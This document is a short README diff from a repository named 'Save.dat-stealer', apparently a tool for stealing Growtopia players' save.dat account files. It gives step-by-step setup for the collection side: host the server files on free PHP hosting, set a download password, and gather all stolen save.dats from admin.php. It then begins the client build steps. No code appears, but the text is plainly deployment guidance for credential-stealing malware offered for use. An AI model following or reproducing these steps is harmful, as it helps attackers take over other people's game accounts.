GrowtopiaNoobs/Save.dat-stealer/README.md

 # How to setup server
  - 1.)
 Make account on free php hosting
  - 2.)
 Upload files from folder server there.
+ - 3.)
+Change password for downloading save.dats in data/password.txt
+ - 4.)
+Get all save.dats from admin.php

 # How to setup client
  - 1.)
 Install visual studio 2013 or newer